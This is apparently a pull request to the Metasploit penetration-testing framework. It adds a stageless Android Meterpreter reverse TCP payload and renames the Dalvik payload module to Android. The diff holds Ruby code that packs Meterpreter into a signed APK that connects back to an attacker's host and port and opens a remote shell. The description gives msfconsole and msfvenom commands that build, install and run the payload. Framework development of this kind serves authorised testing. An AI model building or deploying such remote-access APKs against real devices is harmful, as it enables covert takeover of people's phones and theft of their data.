### PR TITLE
add android stageless meterpreter_reverse_tcp

### DIFF
--- a/lib/msf/core/handler/reverse_http.rb
+++ b/lib/msf/core/handler/reverse_http.rb
@@ -414,8 +414,6 @@ protected
         url = payload_uri(req) + conn_id
         url << '/' unless url[-1] == '/'
 
-        p url
-
         # Short-circuit the payload's handle_connection processing for create_session
         create_session(cli, {
           :passive_dispatcher => self.service,

--- a/lib/msf/core/payload.rb
+++ b/lib/msf/core/payload.rb
@@ -28,7 +28,7 @@ class Payload < Msf::Module
   require 'msf/core/payload/windows'
   require 'msf/core/payload/netware'
   require 'msf/core/payload/java'
-  require 'msf/core/payload/dalvik'
+  require 'msf/core/payload/android'
   require 'msf/core/payload/firefox'
   require 'msf/core/payload/mainframe'
 

--- a/lib/msf/core/payload/android.rb
+++ b/lib/msf/core/payload/android.rb
@@ -3,7 +3,7 @@ require 'msf/core'
 require 'msf/core/payload/uuid/options'
 require 'msf/core/payload/transport_config'
 
-module Msf::Payload::Dalvik
+module Msf::Payload::Android
 
   include Msf::Payload::TransportConfig
   include Msf::Payload::UUID::Options

--- a/lib/msf/core/payload/dalvik.rb
+++ b/lib/msf/core/payload/dalvik.rb
@@ -54,7 +54,6 @@ module Msf::Payload::Dalvik
   def generate_config_hex(opts={})
     opts[:uuid] ||= generate_payload_uuid
 
-    # create the configuration block, which for staged connections is really simple.
     config_opts = {
       ascii_str:  true,
       arch:       opts[:uuid].arch,
@@ -63,7 +62,6 @@ module Msf::Payload::Dalvik
       transports: [transport_config(opts)]
     }
 
-    # create the configuration instance based off the parameters
     config = Rex::Payloads::Meterpreter::Config.new(config_opts)
     config.to_b.unpack('H*').first
   end

--- a/modules/payloads/singles/android/meterpreter_reverse_http.rb
+++ b/modules/payloads/singles/android/meterpreter_reverse_http.rb
@@ -48,6 +48,11 @@ module MetasploitModule
   end
 
   def generate_jar(opts={})
+    opts[:stageless] = true
+    super(opts)
+  end
+
+  def payload_uri(req=nil)
     # Default URL length is 30-256 bytes
     uri_req_len = 30 + luri.length + rand(256 - (30 + luri.length))
     # Generate the short default URL if we don't know available space
@@ -59,23 +64,7 @@ module MetasploitModule
     # TODO: perhaps wire in an existing UUID from opts?
     url << generate_uri_uuid_mode(:init_connect, uri_req_len)
 
-    classes = MetasploitPayloads.read('android', 'meterpreter.dex')
-    opts[:stageless] = true
-    apply_options(classes, opts, url)
-
-    jar = Rex::Zip::Jar.new
-    jar.add_file("classes.dex", fix_dex_header(classes))
-    files = [
-      [ "AndroidManifest.xml" ],
-      [ "resources.arsc" ]
-    ]
-    jar.add_files(files, MetasploitPayloads.path("android", "apk"))
-    jar.build_manifest
-
-    cert, key = generate_cert
-    jar.sign(key, cert, [cert])
-
-    jar
+    url
   end
 
 end

--- a/modules/payloads/singles/android/meterpreter_reverse_http.rb
+++ b/modules/payloads/singles/android/meterpreter_reverse_http.rb
@@ -6,7 +6,7 @@
 require 'msf/core'
 require 'msf/core/handler/reverse_http'
 require 'msf/core/payload/transport_config'
-require 'msf/core/payload/dalvik'
+require 'msf/core/payload/android'
 require 'msf/core/payload/uuid/options'
 require 'msf/base/sessions/meterpreter_android'
 require 'msf/base/sessions/meterpreter_options'
@@ -18,7 +18,7 @@ module MetasploitModule
 
   include Msf::Payload::TransportConfig
   include Msf::Payload::Single
-  include Msf::Payload::Dalvik
+  include Msf::Payload::Android
   include Msf::Payload::UUID::Options
   include Msf::Sessions::MeterpreterOptions
 

--- a/modules/payloads/singles/android/meterpreter_reverse_http.rb
+++ b/modules/payloads/singles/android/meterpreter_reverse_http.rb
@@ -1,0 +1,82 @@
+##
+# This module requires Metasploit: http://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+require 'msf/core'
+require 'msf/core/handler/reverse_http'
+require 'msf/core/payload/transport_config'
+require 'msf/core/payload/dalvik'
+require 'msf/core/payload/uuid/options'
+require 'msf/base/sessions/meterpreter_android'
+require 'msf/base/sessions/meterpreter_options'
+require 'rex/payloads/meterpreter/config'
+
+module MetasploitModule
+
+  CachedSize = :dynamic
+
+  include Msf::Payload::TransportConfig
+  include Msf::Payload::Single
+  include Msf::Payload::Dalvik
+  include Msf::Payload::UUID::Options
+  include Msf::Sessions::MeterpreterOptions
+
+
+  def initialize(info = {})
+
+    super(merge_info(info,
+      'Name'        => 'Android Meterpreter Shell, Reverse HTTP Inline',
+      'Description' => 'Connect back to attacker and spawn a Meterpreter shell',
+      'License'     => MSF_LICENSE,
+      'Platform'    => 'android',
+      'Arch'        => ARCH_DALVIK,
+      'Handler'     => Msf::Handler::ReverseHttp,
+      'Session'     => Msf::Sessions::Meterpreter_Java_Android,
+      'Payload'     => '',
+      ))
+    
+    register_options([
+      OptBool.new('AutoLoadAndroid', [true, "Automatically load the Android extension", true])
+    ], self.class)
+  end
+
+  #
+  # Generate the transport-specific configuration
+  #
+  def transport_config(opts={})
+    transport_config_reverse_http(opts)
+  end
+
+  def generate_jar(opts={})
+    # Default URL length is 30-256 bytes
+    uri_req_len = 30 + luri.length + rand(256 - (30 + luri.length))
+    # Generate the short default URL if we don't know available space
+    if self.available_space.nil?
+      uri_req_len = 5
+    end
+
+    url = "http://#{datastore["LHOST"]}:#{datastore["LPORT"]}#{luri}"
+    # TODO: perhaps wire in an existing UUID from opts?
+    url << generate_uri_uuid_mode(:init_connect, uri_req_len)
+
+    classes = MetasploitPayloads.read('android', 'meterpreter.dex')
+    opts[:stageless] = true
+    apply_options(classes, opts, url)
+
+    jar = Rex::Zip::Jar.new
+    jar.add_file("classes.dex", fix_dex_header(classes))
+    files = [
+      [ "AndroidManifest.xml" ],
+      [ "resources.arsc" ]
+    ]
+    jar.add_files(files, MetasploitPayloads.path("android", "apk"))
+    jar.build_manifest
+
+    cert, key = generate_cert
+    jar.sign(key, cert, [cert])
+
+    jar
+  end
+
+end

--- a/modules/payloads/singles/android/meterpreter_reverse_http.rb
+++ b/modules/payloads/singles/android/meterpreter_reverse_http.rb
@@ -35,7 +35,6 @@ module MetasploitModule
       'Session'     => Msf::Sessions::Meterpreter_Java_Android,
       'Payload'     => '',
       ))
-    
     register_options([
       OptBool.new('AutoLoadAndroid', [true, "Automatically load the Android extension", true])
     ], self.class)

--- a/modules/payloads/singles/android/meterpreter_reverse_tcp.rb
+++ b/modules/payloads/singles/android/meterpreter_reverse_tcp.rb
@@ -42,25 +42,8 @@ module MetasploitModule
   end
 
   def generate_jar(opts={})
-    jar = Rex::Zip::Jar.new
-    classes = MetasploitPayloads.read('android', 'meterpreter.dex')
-    url = "tcp://#{datastore['LHOST']}:#{datastore['LPORT']}"
     opts[:stageless] = true
-    apply_options(classes, opts, url)
-
-    jar.add_file("classes.dex", fix_dex_header(classes))
-    files = [
-      [ "AndroidManifest.xml" ],
-      [ "resources.arsc" ]
-    ]
-    jar.add_files(files, MetasploitPayloads.path("android", "apk"))
-    jar.build_manifest
-
-    cert, key = generate_cert
-    jar.sign(key, cert, [cert])
-
-    jar
+    super(opts)
   end
-
 
 end

--- a/modules/payloads/singles/android/meterpreter_reverse_tcp.rb
+++ b/modules/payloads/singles/android/meterpreter_reverse_tcp.rb
@@ -3,7 +3,7 @@
 # Current source: https://github.com/rapid7/metasploit-framework
 ##
 require 'msf/core'
-require 'msf/core/payload/dalvik'
+require 'msf/core/payload/android'
 require 'msf/core/payload/transport_config'
 require 'msf/base/sessions/meterpreter_android'
 require 'msf/base/sessions/meterpreter_options'
@@ -15,7 +15,7 @@ module MetasploitModule
 
   include Msf::Payload::TransportConfig
   include Msf::Payload::Single
-  include Msf::Payload::Dalvik
+  include Msf::Payload::Android
   include Msf::Sessions::MeterpreterOptions
 
   def initialize(info = {})

--- a/modules/payloads/singles/android/meterpreter_reverse_tcp.rb
+++ b/modules/payloads/singles/android/meterpreter_reverse_tcp.rb
@@ -2,34 +2,36 @@
 # This module requires Metasploit: http://metasploit.com/download
 # Current source: https://github.com/rapid7/metasploit-framework
 ##
-
-require 'metasploit-payloads'
 require 'msf/core'
-require 'msf/core/handler/reverse_tcp'
+require 'msf/core/payload/dalvik'
 require 'msf/core/payload/transport_config'
-require 'msf/base/sessions/command_shell'
-require 'msf/base/sessions/command_shell_options'
+require 'msf/base/sessions/meterpreter_android'
+require 'msf/base/sessions/meterpreter_options'
+require 'rex/payloads/meterpreter/config'
 
 module MetasploitModule
 
   CachedSize = :dynamic
 
-  include Msf::Payload::Stager
   include Msf::Payload::TransportConfig
+  include Msf::Payload::Single
   include Msf::Payload::Dalvik
-  include Msf::Payload::UUID::Options
+  include Msf::Sessions::MeterpreterOptions
 
   def initialize(info = {})
     super(merge_info(info,
-      'Name'        => 'Dalvik Reverse TCP Stager',
-      'Description' => 'Connect back stager',
-      'Author'      => ['timwr', 'OJ Reeves'],
-      'License'     => MSF_LICENSE,
+      'Name'        => 'Android Meterpreter Shell, Reverse TCP Inline',
+      'Description' => 'Connect back to the attacker and spawn a Meterpreter shell',
       'Platform'    => 'android',
       'Arch'        => ARCH_DALVIK,
+      'License'     => MSF_LICENSE,
       'Handler'     => Msf::Handler::ReverseTcp,
-      'Stager'      => {'Payload' => ''}
+      'Session'     => Msf::Sessions::Meterpreter_Java_Android,
+      'Payload'     => '',
     ))
+    register_options([
+      OptBool.new('AutoLoadAndroid', [true, "Automatically load the Android extension", true])
+    ], self.class)
   end
 
   #
@@ -41,17 +43,16 @@ module MetasploitModule
 
   def generate_jar(opts={})
     jar = Rex::Zip::Jar.new
-
-    classes = MetasploitPayloads.read('android', 'apk', 'classes.dex')
-    apply_options(classes, opts, payload_uri)
+    classes = MetasploitPayloads.read('android', 'meterpreter.dex')
+    url = "tcp://#{datastore['LHOST']}:#{datastore['LPORT']}"
+    opts[:stageless] = true
+    apply_options(classes, opts, url)
 
     jar.add_file("classes.dex", fix_dex_header(classes))
-
     files = [
       [ "AndroidManifest.xml" ],
       [ "resources.arsc" ]
     ]
-
     jar.add_files(files, MetasploitPayloads.path("android", "apk"))
     jar.build_manifest
 
@@ -60,5 +61,6 @@ module MetasploitModule
 
     jar
   end
+
 
 end

--- a/modules/payloads/stagers/android/reverse_http.rb
+++ b/modules/payloads/stagers/android/reverse_http.rb
@@ -41,8 +41,7 @@ module MetasploitModule
     url << generate_uri_uuid_mode(:init_java, uri_req_len)
 
     classes = MetasploitPayloads.read('android', 'apk', 'classes.dex')
-    string_sub(classes, 'ZZZZ' + ' ' * 512, 'ZZZZ' + url)
-    apply_options(classes)
+    apply_options(classes, opts, url)
 
     jar = Rex::Zip::Jar.new
     jar.add_file("classes.dex", fix_dex_header(classes))
@@ -58,5 +57,6 @@ module MetasploitModule
 
     jar
   end
+
 
 end

--- a/modules/payloads/stagers/android/reverse_http.rb
+++ b/modules/payloads/stagers/android/reverse_http.rb
@@ -28,7 +28,14 @@ module MetasploitModule
     ))
   end
 
-  def generate_jar(opts={})
+  #
+  # Generate the transport-specific configuration
+  #
+  def transport_config(opts={})
+    transport_config_reverse_http(opts)
+  end
+
+  def payload_uri(req=nil)
     # Default URL length is 30-256 bytes
     uri_req_len = 30 + luri.length + rand(256 - (30 + luri.length))
     # Generate the short default URL if we don't know available space
@@ -40,22 +47,7 @@ module MetasploitModule
     # TODO: perhaps wire in an existing UUID from opts?
     url << generate_uri_uuid_mode(:init_java, uri_req_len)
 
-    classes = MetasploitPayloads.read('android', 'apk', 'classes.dex')
-    apply_options(classes, opts, url)
-
-    jar = Rex::Zip::Jar.new
-    jar.add_file("classes.dex", fix_dex_header(classes))
-    files = [
-      [ "AndroidManifest.xml" ],
-      [ "resources.arsc" ]
-    ]
-    jar.add_files(files, MetasploitPayloads.path("android", "apk"))
-    jar.build_manifest
-
-    cert, key = generate_cert
-    jar.sign(key, cert, [cert])
-
-    jar
+    url
   end
 
 end

--- a/modules/payloads/stagers/android/reverse_http.rb
+++ b/modules/payloads/stagers/android/reverse_http.rb
@@ -58,5 +58,4 @@ module MetasploitModule
     jar
   end
 
-
 end

--- a/modules/payloads/stagers/android/reverse_http.rb
+++ b/modules/payloads/stagers/android/reverse_http.rb
@@ -12,12 +12,12 @@ module MetasploitModule
   CachedSize = :dynamic
 
   include Msf::Payload::Stager
-  include Msf::Payload::Dalvik
+  include Msf::Payload::Android
   include Msf::Payload::UUID::Options
 
   def initialize(info = {})
     super(merge_info(info,
-      'Name'        => 'Dalvik Reverse HTTP Stager',
+      'Name'        => 'Android Reverse HTTP Stager',
       'Description' => 'Tunnel communication over HTTP',
       'Author'      => ['anwarelmakrahy', 'OJ Reeves'],
       'License'     => MSF_LICENSE,

--- a/modules/payloads/stagers/android/reverse_https.rb
+++ b/modules/payloads/stagers/android/reverse_https.rb
@@ -41,7 +41,6 @@ module MetasploitModule
     url << generate_uri_uuid_mode(:init_java, uri_req_len)
 
     classes = MetasploitPayloads.read('android', 'apk', 'classes.dex')
-    string_sub(classes, 'ZZZZ' + ' ' * 512, 'ZZZZ' + url)
 
     verify_cert_hash = get_ssl_cert_hash(datastore['StagerVerifySSLCert'],
                                          datastore['HandlerSSLCert'])
@@ -50,7 +49,7 @@ module MetasploitModule
         string_sub(classes, 'WWWW                                        ', hash)
     end
 
-    apply_options(classes)
+    apply_options(classes, opts, url)
 
     jar = Rex::Zip::Jar.new
     jar.add_file("classes.dex", fix_dex_header(classes))

--- a/modules/payloads/stagers/android/reverse_https.rb
+++ b/modules/payloads/stagers/android/reverse_https.rb
@@ -29,8 +29,13 @@ module MetasploitModule
   end
 
   def generate_jar(opts={})
+    opts[:ssl] = true
+    super(opts)
+  end
+
+  def payload_uri(req=nil)
     # Default URL length is 30-256 bytes
-    uri_req_len = 30 + rand(256-30)
+    uri_req_len = 30 + luri.length + rand(256 - (30 + luri.length))
     # Generate the short default URL if we don't know available space
     if self.available_space.nil?
       uri_req_len = 5
@@ -40,29 +45,8 @@ module MetasploitModule
     # TODO: perhaps wire in an existing UUID from opts?
     url << generate_uri_uuid_mode(:init_java, uri_req_len)
 
-    classes = MetasploitPayloads.read('android', 'apk', 'classes.dex')
-
-    verify_cert_hash = get_ssl_cert_hash(datastore['StagerVerifySSLCert'],
-                                         datastore['HandlerSSLCert'])
-    if verify_cert_hash
-        hash = 'WWWW' + verify_cert_hash.unpack("H*").first
-        string_sub(classes, 'WWWW                                        ', hash)
-    end
-
-    apply_options(classes, opts, url)
-
-    jar = Rex::Zip::Jar.new
-    jar.add_file("classes.dex", fix_dex_header(classes))
-    files = [
-      [ "AndroidManifest.xml" ],
-      [ "resources.arsc" ]
-    ]
-    jar.add_files(files, MetasploitPayloads.path("android", "apk"))
-    jar.build_manifest
-
-    cert, key = generate_cert
-    jar.sign(key, cert, [cert])
-
-    jar
+    url
   end
+
+
 end

--- a/modules/payloads/stagers/android/reverse_https.rb
+++ b/modules/payloads/stagers/android/reverse_https.rb
@@ -12,12 +12,12 @@ module MetasploitModule
   CachedSize = :dynamic
 
   include Msf::Payload::Stager
-  include Msf::Payload::Dalvik
+  include Msf::Payload::Android
   include Msf::Payload::UUID::Options
 
   def initialize(info = {})
     super(merge_info(info,
-      'Name'        => 'Dalvik Reverse HTTPS Stager',
+      'Name'        => 'Android Reverse HTTPS Stager',
       'Description' => 'Tunnel communication over HTTPS',
       'Author'      => ['anwarelmakrahy', 'OJ Reeves'],
       'License'     => MSF_LICENSE,

--- a/modules/payloads/stagers/android/reverse_tcp.rb
+++ b/modules/payloads/stagers/android/reverse_tcp.rb
@@ -39,26 +39,4 @@ module MetasploitModule
     transport_config_reverse_tcp(opts)
   end
 
-  def generate_jar(opts={})
-    jar = Rex::Zip::Jar.new
-
-    classes = MetasploitPayloads.read('android', 'apk', 'classes.dex')
-    apply_options(classes, opts, payload_uri)
-
-    jar.add_file("classes.dex", fix_dex_header(classes))
-
-    files = [
-      [ "AndroidManifest.xml" ],
-      [ "resources.arsc" ]
-    ]
-
-    jar.add_files(files, MetasploitPayloads.path("android", "apk"))
-    jar.build_manifest
-
-    cert, key = generate_cert
-    jar.sign(key, cert, [cert])
-
-    jar
-  end
-
 end

--- a/modules/payloads/stagers/android/reverse_tcp.rb
+++ b/modules/payloads/stagers/android/reverse_tcp.rb
@@ -16,12 +16,12 @@ module MetasploitModule
 
   include Msf::Payload::Stager
   include Msf::Payload::TransportConfig
-  include Msf::Payload::Dalvik
+  include Msf::Payload::Android
   include Msf::Payload::UUID::Options
 
   def initialize(info = {})
     super(merge_info(info,
-      'Name'        => 'Dalvik Reverse TCP Stager',
+      'Name'        => 'Android Reverse TCP Stager',
       'Description' => 'Connect back stager',
       'Author'      => ['timwr', 'OJ Reeves'],
       'License'     => MSF_LICENSE,

--- a/modules/payloads/stages/android/meterpreter.rb
+++ b/modules/payloads/stages/android/meterpreter.rb
@@ -4,7 +4,7 @@
 ##
 
 require 'msf/core'
-require 'msf/core/payload/dalvik'
+require 'msf/core/payload/android'
 require 'msf/base/sessions/meterpreter_android'
 require 'msf/base/sessions/meterpreter_options'
 require 'rex/payloads/meterpreter/config'
@@ -30,7 +30,7 @@ module MetasploitModule
   end
 
   #
-  # Override the Payload::Dalvik version so we can load a prebuilt jar to be
+  # Override the Payload::Android version so we can load a prebuilt jar to be
   # used as the final stage
   #
   def generate_stage(opts={})

--- a/modules/payloads/stages/android/shell.rb
+++ b/modules/payloads/stages/android/shell.rb
@@ -4,7 +4,7 @@
 ##
 
 require 'msf/core'
-require 'msf/core/payload/dalvik'
+require 'msf/core/payload/android'
 require 'msf/core/handler/reverse_tcp'
 require 'msf/base/sessions/command_shell'
 require 'msf/base/sessions/command_shell_options'
@@ -31,7 +31,7 @@ module MetasploitModule
   end
 
   #
-  # Override the {Payload::Dalvik} version so we can load a prebuilt jar
+  # Override the {Payload::Android} version so we can load a prebuilt jar
   # to be used as the final stage
   #
   def generate_stage(opts={})

--- a/spec/modules/payloads_spec.rb
+++ b/spec/modules/payloads_spec.rb
@@ -45,6 +45,26 @@ RSpec.describe 'modules/payloads', :content do
                           reference_name: 'aix/ppc/shell_reverse_tcp'
   end
 
+  context 'android/meterpreter_reverse_http' do
+    it_should_behave_like 'payload cached size is consistent',
+                          ancestor_reference_names: [
+                            'singles/android/meterpreter_reverse_http'
+                          ],
+                          dynamic_size: false,
+                          modules_pathname: modules_pathname,
+                          reference_name: 'android/meterpreter_reverse_http'
+  end
+
+  context 'android/meterpreter_reverse_tcp' do
+    it_should_behave_like 'payload cached size is consistent',
+                          ancestor_reference_names: [
+                            'singles/android/meterpreter_reverse_tcp'
+                          ],
+                          dynamic_size: false,
+                          modules_pathname: modules_pathname,
+                          reference_name: 'android/meterpreter_reverse_tcp'
+  end
+
   context 'android/meterpreter/reverse_http' do
     it_should_behave_like 'payload cached size is consistent',
                           ancestor_reference_names: [


### PR DESCRIPTION
This pr adds a android/meterpreter_reverse_tcp payload.
I'll add android/meterpreter_reverse_http asap (I'm currently having issues with multiple sessions being reported).
## Verification

This PR requires the payload changes here: https://github.com/rapid7/metasploit-payloads/pull/118
- [x] Start a handler: 

```
./msfconsole -qx "use exploit/multi/handler; set payload android/meterpreter_reverse_tcp; set lhost 0.0.0.0; set lport 4444; set ExitOnSession false; run -j"
```
- [x] Create a stageless apk, install and run it:

```
./msfvenom -p android/meterpreter_reverse_tcp LHOST=192.168.56.1 LPORT=4444 -o met.apk
./tools/exploit/install_msf_apk.sh met.apk
```
- [x] **Verify** You get a working session
- [x] **Verify** You do not see 'sending stage' on new sessions
